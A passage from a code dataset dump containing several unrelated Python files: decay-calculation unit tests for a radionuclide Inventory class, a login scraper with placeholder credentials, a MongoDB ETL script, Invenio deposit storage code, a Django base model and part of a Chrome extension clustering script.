\"\"\"\n\n        inv1 = Inventory({\"H-3\": 1.0})\n        inv2 = Inventory({\"C-14\": 1.0, \"H-3\": 4.0})\n        inv = inv2 - inv1\n        self.assertEqual(inv.contents, {\"C-14\": 1.0, \"H-3\": 3.0})\n\n        temp_data = copy.deepcopy(DEFAULTDATA)\n        temp_data.dataset = \"icrp107_\"\n        inv3 = Inventory({\"H-3\": 2.0}, data=temp_data)\n        with self.assertRaises(ValueError):\n            inv = inv1 - inv3\n\n    def test_inventory___mul__(self):\n        \"\"\"\n        Test operator to multiply activities in an inventory by a constant.\n        \"\"\"\n\n        inv = Inventory({\"Sr-90\": 1.0, \"Cs-137\": 1.0})\n        inv = inv * 2\n        self.assertEqual(inv.contents, {\"Cs-137\": 2.0, \"Sr-90\": 2.0})\n\n    def test_inventory___rmul__(self):\n        \"\"\"\n        Test operator to right multiply a constant by activities in an inventory.\n        \"\"\"\n\n        inv = Inventory({\"Sr-90\": 1.0, \"Cs-137\": 1.0})\n        inv = 2 * inv\n        self.assertEqual(inv.contents, {\"Cs-137\": 2.0, \"Sr-90\": 2.0})\n\n    def test_inventory___truediv__(self):\n        \"\"\"\n        Test operator to divide activities in an inventory by a constant.\n        \"\"\"\n\n        inv = Inventory({\"Sr-90\": 1.0, \"Cs-137\": 1.0})\n        inv = inv / 2\n        self.assertEqual(inv.contents, {\"Cs-137\": 0.5, \"Sr-90\": 0.5})\n\n    def test_inventory_remove(self):\n        \"\"\"\n        Test method to remove radionuclides from an inventory.\n        \"\"\"\n\n        inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n        with self.assertRaises(NotImplementedError):\n            inv.remove(1.0)\n\n    def test_inventory_remove_string(self):\n        \"\"\"\n        Test method to remove one radionuclide from an inventory using a radionuclide string.\n        \"\"\"\n\n        inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n        inv.remove(\"H-3\")\n        self.assertEqual(inv.contents, {\"C-14\": 3.0, \"K-40\": 4.0})\n\n        with self.assertRaises(ValueError):\n            inv.remove(\"Be-10\")\n\n    def test_inventory_remove_radionuclide(self):\n        \"\"\"\n        Test method to remove one radionuclide from 
an inventory using a ``Radionuclide`` object.\n \"\"\"\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.remove(Radionuclide(\"H-3\"))\n self.assertEqual(inv.contents, {\"C-14\": 3.0, \"K-40\": 4.0})\n\n with self.assertRaises(ValueError):\n inv.remove(Radionuclide(\"Be-10\"))\n\n def test_inventory_remove_list(self):\n \"\"\"\n Test operator to remove list of radionuclides from an inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.remove([\"H-3\", \"C-14\"])\n self.assertEqual(inv.contents, {\"K-40\": 4.0})\n\n with self.assertRaises(ValueError):\n inv.remove([\"Be-10\", \"C-14\"])\n\n inv = Inventory({\"C-14\": 3.0, \"H-3\": 4.0, \"K-40\": 4.0})\n inv.remove([\"H-3\", Radionuclide(\"C-14\")])\n self.assertEqual(inv.contents, {\"K-40\": 4.0})\n\n def test_inventory_decay(self):\n \"\"\"\n Test Inventory decay() calculations.\n \"\"\"\n\n inv = Inventory({\"H-3\": 10.0})\n self.assertEqual(inv.decay(12.32, \"y\").contents, {\"H-3\": 5.0})\n inv = Inventory({\"Tc-99m\": 2.3, \"I-123\": 5.8})\n self.assertEqual(\n inv.decay(20.0, \"h\").contents,\n {\n \"I-123\": 2.040459244534774,\n \"Tc-99\": 6.729944738772211e-09,\n \"Tc-99m\": 0.22950748010063513,\n \"Te-123\": 9.485166535243877e-18,\n \"Te-123m\": 7.721174031572363e-07,\n },\n )\n inv = Inventory({\"U-238\": 99.274, \"U-235\": 0.720, \"U-234\": 0.005})\n self.assertEqual(\n inv.decay(1e9, \"y\").contents,\n {\n \"Ac-227\": 0.2690006281740556,\n \"At-218\": 0.017002868638497183,\n \"At-219\": 2.227325201281319e-07,\n \"Bi-210\": 85.01434361515662,\n \"Bi-211\": 0.26900084425585846,\n \"Bi-214\": 85.01432618961896,\n \"Bi-215\": 2.1605054452429237e-07,\n \"Fr-223\": 0.0037122086688021884,\n \"Hg-206\": 1.6152725286830197e-06,\n \"Pa-231\": 0.2690006198549055,\n \"Pa-234\": 0.13601313171698984,\n \"Pa-234m\": 85.00820732310412,\n \"Pb-210\": 85.01434361489548,\n \"Pb-211\": 0.2690008442558569,\n \"Pb-214\": 84.99734032384839,\n \"Po-210\": 85.01434362236536,\n \"Po-211\": 0.0007424423301461693,\n \"Po-214\": 84.99649018398776,\n \"Po-215\": 0.26900084425583065,\n \"Po-218\": 85.01434319248591,\n \"Ra-223\": 0.26900062820528614,\n \"Ra-226\": 85.01434319228659,\n \"Rn-218\": 1.7002868638497185e-05,\n \"Rn-219\": 0.26900062820528614,\n \"Rn-222\": 85.0143431924858,\n \"Th-227\": 0.2652884195245263,\n \"Th-230\": 85.01431274847525,\n \"Th-231\": 0.26898810215560653,\n \"Th-234\": 85.00820732310407,\n \"Tl-206\": 0.00011383420610068998,\n \"Tl-207\": 0.26825840192571576,\n \"Tl-210\": 0.01785300849981999,\n \"U-234\": 85.01287846492669,\n \"U-235\": 0.2689881021544942,\n \"U-238\": 85.00820732184867,\n },\n )\n\n # Catch incorrect sig_fig or no SymPy data in decay dataset\n with self.assertRaises(ValueError):\n inv.decay(1e9, \"y\", sig_fig=0)\n data = DecayData(\"icrp107\", load_sympy=False)\n inv = Inventory({\"H-3\": 10.0}, data=data)\n with self.assertRaises(ValueError):\n inv.decay(1e9, \"y\", sig_fig=320)\n\n def test_inventory_decay_high_precision(self):\n \"\"\"\n Test Inventory decay_high_precision() calculations.\n \"\"\"\n inv = Inventory({\"U-238\": 99.274, \"U-235\": 0.720, \"U-234\": 0.005})\n self.assertEqual(\n inv.decay_high_precision(1e9, \"y\").contents,\n {\n \"Ac-227\": 0.26900062817405557,\n \"At-218\": 0.01700286863849718,\n \"At-219\": 2.227325201281318e-07,\n \"Bi-210\": 85.01434361515662,\n \"Bi-211\": 0.2690008442558584,\n \"Bi-214\": 85.01432618961894,\n \"Bi-215\": 2.1605054452429227e-07,\n \"Fr-223\": 0.003712208668802187,\n \"Hg-206\": 
1.6152725286830195e-06,\n \"Pa-231\": 0.2690006198549054,\n \"Pa-234\": 0.13601313171698984,\n \"Pa-234m\": 85.00820732310412,\n \"Pb-210\": 85.01434361489547,\n \"Pb-211\": 0.26900084425585685,\n \"Pb-214\": 84.99734032384836,\n \"Po-210\": 85.01434362236536,\n \"Po-211\": 0.0007424423301461693,\n \"Po-214\": 84.99649018398776,\n \"Po-215\": 0.26900084425583065,\n \"Po-218\": 85.0143431924859,\n \"Ra-223\": 0.2690006282052861,\n \"Ra-226\": 85.0143431922866,\n \"Rn-218\": 1.7002868638497178e-05,\n \"Rn-219\": 0.26900062820528614,\n \"Rn-222\": 85.01434319248578,\n \"Th-227\": 0.26528841952452625,\n \"Th-230\": 85.01431274847525,\n \"Th-231\": 0.26898810215560653,\n \"Th-234\": 85.00820732310407,\n \"Tl-206\": 0.00011383420610068996,\n \"Tl-207\": 0.2682584019257157,\n \"Tl-210\": 0.017853008499819988,\n \"U-234\": 85.01287846492669,\n \"U-235\": 0.26898810215449415,\n \"U-238\": 85.00820732184867,\n },\n )\n\n def test_inventory_half_lives(self):\n \"\"\"\n Test method to fetch half-lives of radionuclides in the Inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"H-3\": 2.0})\n self.assertEqual(inv.half_lives(\"y\"), {\"C-14\": 5700.0, \"H-3\": 12.32})\n self.assertEqual(\n inv.half_lives(\"readable\"), {\"C-14\": \"5.70 ky\", \"H-3\": \"12.32 y\"}\n )\n\n def test_inventory_progeny(self):\n \"\"\"\n Test method to fetch progeny of radionuclides in the Inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"K-40\": 2.0})\n self.assertEqual(inv.progeny(), {\"C-14\": [\"N-14\"], \"K-40\": [\"Ca-40\", \"Ar-40\"]})\n\n def test_inventory_branching_fractions(self):\n \"\"\"\n Test method to fetch branching fractions of radionuclides in the Inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"K-40\": 2.0})\n self.assertEqual(\n inv.branching_fractions(), {\"C-14\": [1.0], \"K-40\": [0.8914, 0.1086]}\n )\n\n def test_inventory_decay_modes(self):\n \"\"\"\n Test method to fetch decay modes of radionuclides in the Inventory.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"K-40\": 2.0})\n self.assertEqual(\n inv.decay_modes(),\n {\"C-14\": [\"\\u03b2-\"], \"K-40\": [\"\\u03b2-\", \"\\u03b2+ \\u0026 EC\"]},\n )\n\n @patch(\"matplotlib.pyplot.show\")\n def test_inventory_plot(self, mock_show):\n \"\"\"\n Test method to create decay plots.\n \"\"\"\n\n inv = Inventory({\"C-14\": 1.0, \"K-40\": 2.0})\n _, ax = inv.plot(105, \"ky\")\n self.assertEqual(ax.get_xscale(), \"linear\")\n self.assertEqual(ax.get_yscale(), \"linear\")\n self.assertEqual(ax.get_xlabel(), \"Time (ky)\")\n self.assertEqual(ax.get_ylabel(), \"Activity\")\n self.assertEqual(ax.get_xlim(), (-5.25, 110.25))\n self.assertEqual(ax.get_ylim(), (0.0, 2.1))\n self.assertEqual(ax.get_legend_handles_labels()[-1], [\"K-40\", \"C-14\"])\n\n _, ax = inv.plot(\n 100,\n xscale=\"log\",\n yscale=\"log\",\n yunits=\"Bq\",\n sig_fig=320,\n display=[\"K40\", \"C14\"],\n )\n self.assertEqual(ax.get_xscale(), \"log\")\n self.assertEqual(ax.get_yscale(), \"log\")\n self.assertEqual(ax.get_xlabel(), \"Time (s)\")\n self.assertEqual(ax.get_ylabel(), \"Activity (Bq)\")\n self.assertEqual(ax.get_xlim()[0], 0.0707945784384138)\n self.assertEqual(ax.get_ylim(), (0.1, 2.1))\n self.assertEqual(ax.get_legend_handles_labels()[-1], [\"K-40\", \"C-14\"])\n\n _, ax = inv.plot(100, \"ky\", xmin=50, ymin=1.0, ymax=2.5, display=\"K40\")\n self.assertEqual(ax.get_xlim(), (47.5, 102.5))\n self.assertEqual(ax.get_ylim(), (1.0, 2.5))\n self.assertEqual(ax.get_legend_handles_labels()[-1], [\"K-40\"])\n\n _, ax = inv.plot(100, \"ky\", order=\"alphabetical\")\n 
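# with order=\"alphabetical\" the legend labels flip relative to the dataset order\n        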
self.assertEqual(ax.get_legend_handles_labels()[-1], [\"C-14\", \"K-40\"])\n\n        with self.assertRaises(ValueError):\n            inv.plot(100, \"ky\", order=\"invalid\")\n\n    def test_inventory___repr__(self):\n        \"\"\"\n        Test Inventory representations.\n        \"\"\"\n\n        inv = Inventory({\"H-3\": 10.0})\n        self.assertEqual(\n            inv.__repr__(), \"Inventory: {'H-3': 10.0}, decay dataset: icrp107\"\n        )\n\n    def test_inventory___eq__(self):\n        \"\"\"\n        Test Inventory equality.\n        \"\"\"\n\n        inv1 = Inventory({\"H-3\": 10.0})\n        inv2 = Inventory({\"H3\": 10.0})\n        self.assertEqual(inv1, inv2)\n\n        data = DecayData(\"icrp107\")\n        inv2 = Inventory({\"H-3\": 10.0}, data)\n        self.assertEqual(inv1, inv2)\n\n    def test_inventory___ne__(self):\n        \"\"\"\n        Test Inventory inequality.\n        \"\"\"\n\n        inv1 = Inventory({\"H-3\": 10.0})\n        inv2 = Inventory({\"Cs-137\": 10.0})\n        self.assertNotEqual(inv1, inv2)\n\n        inv1 = Inventory({\"H-3\": 10.0})\n        inv2 = Inventory({\"H-3\": 5.0})\n        self.assertNotEqual(inv1, inv2)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"tests/test_inventory.py","file_name":"test_inventory.py","file_ext":"py","file_size_in_byte":19226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221259042","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom selenium import webdriver\r\nheaders={\r\n    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\r\n    'Accept-Encoding':'gzip, deflate',\r\n    'Accept-Language':'zh-CN,zh;q=0.8',\r\n    'Cache-Control':'max-age=0',\r\n    'Content-Type':'application/x-www-form-urlencoded',\r\n    'Host':'home.51cto.com',\r\n    'Referer':'http://home.51cto.com/index',\r\n    'Proxy-Connection':'keep-alive'\r\n    }\r\n\r\n\r\n\r\nurl=\"http://home.51cto.com/index\"\r\n\r\nsession=requests.Session()\r\nresponse=session.get(url,headers=headers)\r\nprint(session.cookies)\r\nbs=BeautifulSoup(response.content,\"html.parser\")\r\ncsrf=bs.find(\"input\",attrs={\"name\":\"_csrf\"}).get(\"value\")\r\nprint(csrf+\"\\n\")\r\ndata={\r\n    '_csrf':csrf,\r\n\t'LoginForm[username]':\"xxxxxxx\",\r\n\t'LoginForm[password]':\"xxxxxxx\",\r\n\t'LoginForm[rememberMe]':'0',\r\n\t'login-button':'登 录'\r\n    }\r\n\r\n\r\nsession.post(url,data=data,headers=headers)\r\n\r\nresponse=session.get(\"http://down.51cto.com/credits\")\r\n#driver=webdriver.Chrome(r\"C:\\Python\\phantomjs\\bin\\chromedriver.exe\")\r\n#driver.get(\"http://down.51cto.com/credits\")\r\nbs=BeautifulSoup(response.content,\"html.parser\")\r\nprint(bs)\r\n","sub_path":"spider/spider2.py","file_name":"spider2.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414675512","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 12 01:02:05 2018\r\n@author: Abdur\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport pymongo\r\nimport json\r\nimport numpy as np\r\n\r\n# read csv raw data\r\ndfNspl=pd.read_csv(\"NSPL_FEB_2018_UK.csv\")\r\ndfImd=pd.read_csv(\"imd.csv\")\r\n# data reduction\r\ndfNspl=dfNspl.loc[dfNspl['doterm'].isnull()] # live postcodes only\r\ndfNspl=dfNspl.loc[dfNspl['ctry']=='E92000001']# filtering out all other countries in UK except England\r\ncolumns_Imd=[\r\n    \"lsoa11\",\r\n    \"EmploymentScore\",\r\n    \"EducationSkillsandTrainingScore\",\r\n    \"HealthDeprivationandDisabilityScore\",\r\n    \"CrimeScore\"]\r\n\r\ncolumns_Nspl=[\"lsoa11\",\"lat\",\"long\"]\r\ndfNspl=dfNspl[columns_Nspl]\r\ndfImd=dfImd[columns_Imd]\r\n\r\n\r\n\r\n\r\n# merge the reduced datasets\r\ndf_merge=pd.merge(dfImd, dfNspl, on='lsoa11', how='outer')#left outer join, to ignore any areas that are not included in IMD dataset\r\n\r\n#reduce decimal places and group by lat,long pair (as a composite key) because the 2 columns make one location entity\r\npd.options.display.float_format = '{:.4f}'.format\r\n\r\nrounded=df_merge.round(4)\r\n\r\ngrouped_rounded = rounded.groupby(['lat','long']).mean()\r\n\r\ngrouped_rounded = grouped_rounded.reset_index()\r\n\r\nfinal_columns=[\"lat\",\"long\",\r\n    \"EmploymentScore\",\r\n    \"EducationSkillsandTrainingScore\",\r\n    \"HealthDeprivationandDisabilityScore\",\r\n    \"CrimeScore\"]\r\n\r\n# rename columns positionally: the two long IMD score names become EducationScore and HealthScore\r\ngrouped_rounded.columns = [\"lat\",\"long\",\r\n    \"EmploymentScore\",\r\n    \"EducationScore\",\r\n    \"HealthScore\",\r\n    \"CrimeScore\"]\r\n\r\n\r\n#insert in mongodb\r\nmng_client = pymongo.MongoClient('localhost', 27017)\r\nmng_db = mng_client['myNewdb2']\r\ncollection_name = 'shortAndSelected4'\r\n\r\ndata_json = json.loads(grouped_rounded.to_json(orient='records'))\r\ndb_cm = mng_db[collection_name]\r\ndb_cm.remove()\r\ndb_cm.insert(data_json)\r\nprint(\"done\")\r\n# imd District\r\n\r\ndfImdDistrict=pd.read_csv(\"imd.csv\")\r\n\r\n# group\r\ngrouped = dfImdDistrict.groupby(['LocalAuthorityDistrictname'],as_index=False).mean()\r\n\r\ngrouped = grouped.reset_index()\r\n# write to mongo\r\ndata_json = json.loads(grouped.to_json(orient='records'))\r\nmng_client = pymongo.MongoClient('localhost', 27017)\r\nmng_db = mng_client['myNewdb2']\r\ncollection_name = 'imd2'\r\ndb_cm = mng_db[collection_name]\r\ndb_cm.remove()\r\ndb_cm.insert(data_json)","sub_path":"etl_pre.py","file_name":"etl_pre.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"410004116","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Lifewatch DAAP.\n# Copyright (C) 2015 Ana Yaiza Rodriguez Marrero.\n#\n# Lifewatch DAAP is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Lifewatch DAAP is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Lifewatch DAAP. If not, see .\n\n#\n# This file is part of Invenio.\n# Copyright (C) 2013, 2015 CERN.\n#\n# Invenio is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License as\n# published by the Free Software Foundation; either version 2 of the\n# License, or (at your option) any later version.\n#\n# Invenio is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU\n# General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Invenio; if not, write to the Free Software Foundation, Inc.,\n# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.\n\n\"\"\"Storage abstraction layer for WebDeposit.\"\"\"\n\nimport hashlib\nimport urllib2\nimport uuid\n\nfrom fs import opener\nfrom fs import path\n\nfrom flask import current_app\n\nfrom invenio.base.globals import cfg\n\n\nclass UploadError(IOError):\n\n    \"\"\"Error during upload.\"\"\"\n\n\nclass ExternalFile(object):\n\n    \"\"\"Wrapper around a URL to make it behave like a file.\n\n    Allows external files to be passed to the storage layer.\n    \"\"\"\n\n    def __init__(self, url, filename):\n        \"\"\"Initialize external file.\"\"\"\n        from invenio.legacy.bibdocfile.api import open_url, \\\n            InvenioBibdocfileUnauthorizedURL\n        try:\n            self._file = open_url(url, headers={})\n            self.filename = None\n            info = self._file.info()\n            content_disposition = info.getheader('Content-Disposition')\n            if content_disposition:\n                for item in content_disposition.split(';'):\n                    current_app.logger.debug(\"item: %s\" % item)\n                    item = item.strip()\n                    if item.strip().startswith('filename='):\n                        s = item[len('filename='):]\n                        if (s[0] == s[-1]) and s.startswith((\"'\", '\"')):\n                            s = s[1:-1]\n                        self.filename = s\n                        current_app.logger.debug(\"filename: %s\"\n                                                 % self.filename)\n            if not self.filename:\n                self.filename = filename\n\n            length = info.getheader('Content-length')\n            if length is None:\n                current_app.logger.warning(\"Content-Length not set!\")\n                length = 0\n            size = int(length)\n            if size > cfg['DEPOSIT_MAX_UPLOAD_SIZE']:\n                raise UploadError(\"File too big\")\n        except InvenioBibdocfileUnauthorizedURL as e:\n            raise UploadError(str(e))\n        except urllib2.URLError as e:\n            raise UploadError('URL could not be opened: %s' % str(e))\n\n    def close(self):\n        \"\"\"Close the external file.\"\"\"\n        self._file.close()\n\n    def read(self, chunk_size=None):\n        \"\"\"Read the external file.\"\"\"\n        # honour the chunk_size argument instead of always reading everything\n        if chunk_size is None:\n            return self._file.read()\n        return self._file.read(chunk_size)\n\n\nclass Storage(object):\n\n    \"\"\"Default storage backend.\"\"\"\n\n    _fsdir = None\n\n    def __init__(self, fs_path):\n        \"\"\"Initialize with file system path.\"\"\"\n        self.fs_path = fs_path\n\n    @property\n    def storage(self):\n        \"\"\"Get the pyFilesystem object for the backend path.\"\"\"\n        if self._fsdir is None:\n            # Opens a directory, creates it if needed, and ensures\n            # it is writeable.\n            self._fsdir = opener.fsopendir(\n                self.fs_path, writeable=True, create_dir=True\n            )\n        return self._fsdir\n\n    def unique_filename(self, filename):\n        \"\"\"Generate a unique secure filename.\"\"\"\n        return str(uuid.uuid4()) + \"-\" + filename\n\n    def save(self, incoming_file, filename, unique_name=True,\n             with_checksum=True, chunksize=65536):\n        \"\"\"Store the incoming file.\"\"\"\n        if unique_name:\n            filename = self.unique_filename(filename)\n\n        fs_file = self.storage.open(filename, 'wb')\n        checksum = None\n        m = hashlib.md5()\n\n        f_bytes = incoming_file.read(chunksize)\n        while f_bytes:\n            fs_file.write(f_bytes)\n            if with_checksum:\n                m.update(f_bytes)\n            f_bytes = incoming_file.read(chunksize)\n\n        fs_file.close()\n        checksum = m.hexdigest()\n\n        # Create complete file path and return it\n        return (\n            path.join(self.fs_path, filename),\n            self.storage.getsize(filename),\n            checksum,\n            with_checksum,\n        )\n\n    @staticmethod\n    def delete(fs_path):\n        \"\"\"Delete the file on storage.\"\"\"\n        (dirurl, filename) = opener.pathsplit(fs_path)\n        fs = opener.fsopendir(dirurl)\n        fs.remove(filename)\n\n    
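# Note: these static helpers split a full fs path into (dir URL, filename)\n    # before opening the directory with pyFilesystem.\n    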
@staticmethod\n    def is_local(fs_path):\n        \"\"\"Determine if file is a local file.\"\"\"\n        (dirurl, filename) = opener.pathsplit(fs_path)\n        fs = opener.fsopendir(dirurl)\n        return fs.hassyspath(filename)\n\n    @staticmethod\n    def get_url(fs_path):\n        \"\"\"Get a URL for the file.\"\"\"\n        (dirurl, filename) = opener.pathsplit(fs_path)\n        fs = opener.fsopendir(dirurl)\n        return fs.getpathurl(filename)\n\n    @staticmethod\n    def get_syspath(fs_path):\n        \"\"\"Get a local system path to the file.\"\"\"\n        (dirurl, filename) = opener.pathsplit(fs_path)\n        fs = opener.fsopendir(dirurl)\n        return fs.getsyspath(filename)\n\n\nclass DepositionStorage(Storage):\n\n    \"\"\"Deposition storage backend.\n\n    Saves files to a folder (//).\n    \"\"\"\n\n    def __init__(self, deposition_id):\n        \"\"\"Initialize storage.\"\"\"\n        self.fs_path = path.join(\n            cfg['DEPOSIT_STORAGEDIR'],\n            str(deposition_id)\n        )\n\n\nclass ChunkedDepositionStorage(DepositionStorage):\n\n    \"\"\"Chunked storage backend.\n\n    Capable of handling storage of a file in multiple chunks. Otherwise\n    similar to DepositionStorage.\n    \"\"\"\n\n    def chunk_filename(self, filename, chunks, chunk):\n        \"\"\"Generate chunk file name.\"\"\"\n        return \"%s_%s_%s\" % (\n            filename,\n            chunks,\n            chunk,\n        )\n\n    def save(self, incoming_file, filename, chunk=None, chunks=None):\n        \"\"\"Save one chunk of an incoming file.\"\"\"\n        try:\n            # Generate chunked file name\n            chunk = int(chunk)\n            chunks = int(chunks)\n        except (ValueError, TypeError):\n            raise UploadError(\"Invalid chunk value: %s\" % chunk)\n\n        # Store chunk\n        chunk_filename = self.chunk_filename(filename, chunks, chunk)\n\n        res = super(ChunkedDepositionStorage, self).save(\n            incoming_file, chunk_filename, unique_name=False,\n            with_checksum=False,\n        )\n\n        # Only merge files on the last chunk\n        if chunk != chunks - 1:\n            return res\n\n        # Get the chunks\n        file_chunks = self.storage.listdir(\n            wildcard=self.chunk_filename(\n                filename, chunks, '*'\n            )\n        )\n        file_chunks.sort(key=lambda x: int(x.split(\"_\")[-1]))\n\n        # Write the chunks into one file\n        filename = self.unique_filename(filename)\n        fs_file = self.storage.open(filename, 'wb')\n        m = hashlib.md5()\n\n        for c in file_chunks:\n            fs_c = self.storage.open(c, 'rb')\n\n            f_bytes = fs_c.read(65536)\n            while f_bytes:\n                fs_file.write(f_bytes)\n                m.update(f_bytes)\n                f_bytes = fs_c.read(65536)\n\n            fs_c.close()\n\n            # Remove each chunk right after appending to main file, to\n            # minimize storage usage.\n            self.storage.remove(c)\n\n        fs_file.close()\n        checksum = m.hexdigest()\n\n        return (\n            path.join(self.fs_path, filename),\n            self.storage.getsize(filename),\n            checksum,\n            True\n        )\n","sub_path":"lw_daap/modules/invenio_deposit/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":8641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242127504","text":"\"\"\"\nDefinition of models.\n\"\"\"\n\nfrom django.db import models\n\nclass BaseModel(models.Model):\n    created = models.DateTimeField(auto_now_add=True, db_index=True, blank=False, null=False)\n    updated = models.DateTimeField(db_index=True, blank=False, auto_now=True)\n\n    def set_fields_from_dict(self, fields, data, exclusion_list=None):\n        \"\"\" apply a dictionary to the fields of an object \"\"\"\n        \n        if exclusion_list is None:\n            exclusion_list = []\n\n        for key in data:\n            if key in exclusion_list:\n                continue\n            # the exclusion check already happened above, so only membership in fields matters\n            if key in fields:\n                if type(data[key]) is set:\n                    data[key] = list(data[key])\n                setattr(self, key, data[key])\n\n    class 
Meta:\n abstract = True\n default_permissions = ()\n ordering = (\"-created\",)\n","sub_path":"weblog/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"379918972","text":"from datetime import datetime\nimport json\nfrom re import match\nfrom subprocess import check_output\n\nfrom bs4 import BeautifulSoup as Bsoup\nfrom plotly import offline as plotoff\nfrom plotly.graph_objs import Bar, Layout, Figure\nfrom sqlalchemy import Table, select, update, and_, insert, desc\n\nfrom common.chrome_db import *\n\nTESTING = False\n\n\ndef set_all_centroid_families():\n # Look through the DB for extension entries that don't have a centroid family listed\n db_conn = DB_META.bind.connect() # Connect to the database\n\n # Get a handle on the two tables\n extension = Table('extension', DB_META)\n cent_fam = Table('centroid_family', DB_META)\n\n # Cycle through all the entries that don't have an assigned centroid family yet\n s = select([extension]).where(extension.c.centroid_group.is_(None))\n cnt = 0\n for e_row in db_conn.execute(s):\n s_fam = select([cent_fam]).where(and_(cent_fam.c.size == e_row[extension.c.size],\n # cent_fam.c.ctime == e_row[extension.c.ctime],\n cent_fam.c.num_dirs == e_row[extension.c.num_dirs],\n cent_fam.c.num_files == e_row[extension.c.num_files],\n cent_fam.c.ttl_files == e_row[extension.c.ttl_files],\n cent_fam.c.perms == e_row[extension.c.perms],\n cent_fam.c.depth == e_row[extension.c.depth],\n cent_fam.c.type == e_row[extension.c.type],))\n\n f_row = db_conn.execute(s_fam).fetchone()\n if f_row:\n with db_conn.begin():\n # Entry exists. Add the index to the extension row to connect to the family\n db_conn.execute(update(extension).where(extension.c.pk == e_row['pk']).\n values(centroid_group=f_row['pk']))\n\n # Increment the membership count and set the last updated value to now\n db_conn.execute(update(cent_fam).where(cent_fam.c.pk == f_row['pk']).\n values(num_members=f_row['num_members']+1,\n members_updated=datetime.today()))\n cnt += 1\n\n else:\n with db_conn.begin():\n # Family entry doesn't exist, create it with a family membership count of 1, last updated value of now\n fam_vals = {'size': e_row[extension.c.size],\n # 'ctime': e_row[extension.c.ctime],\n 'num_dirs': e_row[extension.c.num_dirs],\n 'num_files': e_row[extension.c.num_files],\n 'ttl_files': e_row[extension.c.ttl_files],\n 'perms': e_row[extension.c.perms],\n 'depth': e_row[extension.c.depth],\n 'type': e_row[extension.c.type],\n 'num_members': 1,\n 'members_updated': datetime.today()}\n res = db_conn.execute(insert(cent_fam).values(fam_vals))\n\n # Add the index of the new family to the extension row to connect them\n db_conn.execute(update(extension).where(extension.c.pk == e_row['pk']).\n values(centroid_group=res.inserted_primary_key[0]))\n cnt += 1\n\n if cnt and not cnt % 1000:\n print('Added %d extensions to a family' % cnt)\n\n print('Added %d extensions to a family' % cnt)\n\n # TODO: We should do the same kind of thing for all the extensions' i_centroid_group\n\n calc_it(db_conn)\n\n db_conn.close()\n\n\ndef calc_it(db_conn=None):\n close_conn = False\n if db_conn is None:\n close_conn = True\n db_conn = DB_META.bind.connect() # Connect to the database\n\n # Get a handle on the two tables\n extension = Table('extension', DB_META)\n cent_fam = Table('centroid_family', DB_META)\n\n # Cycle through the centroid family IDs\n # TODO: Make this more efficient by 
selecting only those that are NULL or all members > distinct\n s = select([cent_fam.c.pk])\n for f2_row in db_conn.execute(s):\n # Query the extension table for the members of the family, counting the distinct ones\n all_mem = select([extension.c.ext_id, extension.c.pk]).\\\n where(extension.c.centroid_group == f2_row[cent_fam.c.pk]).alias('all_members')\n s_cnt = select([all_mem.c.ext_id], distinct=True).select_from(all_mem).alias('distinct_id_members').count()\n # print(str(s_cnt))\n # break\n n = int(db_conn.execute(s_cnt).fetchone()[0])\n\n # Add this count as the distinct_id_members field\n with db_conn.begin():\n db_conn.execute(update(cent_fam).where(cent_fam.c.pk == f2_row[cent_fam.c.pk]).\n values(distinct_id_members=n,\n distinct_members_updated=datetime.today()))\n\n if close_conn:\n db_conn.close()\n\n\ndef reset_membership_counts():\n # Have the DB tell us how many extensions are part of each family\n pass\n\n\ndef count_ext_versions():\n db_conn = DB_META.bind.connect() # Connect to the database\n\n # Get a handle on the table\n extension = Table('extension', DB_META)\n\n # Get the list of distinct CRX IDs from the extension table\n # We don't want to get the list from the id_list table because not all the IDs in that table are helpful here\n s = select([extension.c.ext_id]).distinct()\n version_counts = {}\n id_cnt = 0\n\n # For each distinct ID, count how many rows have that ID\n for d_row in db_conn.execute(s):\n s_cnt = select([extension.c.version]).where(extension.c.ext_id == d_row[extension.c.ext_id]).\\\n alias('version_count').count()\n n = 